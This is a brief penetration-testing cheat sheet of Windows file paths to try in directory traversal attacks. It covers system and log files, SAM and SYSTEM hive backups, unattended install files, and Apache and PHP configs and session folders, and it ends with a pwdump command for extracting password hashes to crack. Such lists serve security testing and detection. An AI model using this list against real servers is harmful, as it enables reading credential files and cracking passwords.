Windows Directory traversal

Windows-specific syntax

C:\windows\win.ini   \boot.ini  #check both
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf
c:\windows\system32\eula.txt
cl\windows\system32\license.rtf
c:\WINNT\win.ini


#Apache default locations on Windows

c:\Program Files\Apache Group\Apache\logs\access.log  
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\Program Files\xampp\apache\conf\httpd.conf

# PHP session locations

c:\WINDOWS\TEMP\  
c:\php\sessions\  
c:\php5\sessions\  
c:\php4\sessions\
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini

#  Password hashes
c:\WINDOWS\Repair\SAM
c:\WINDOWS\Repair\system

# Then crack with
pwdump SAM system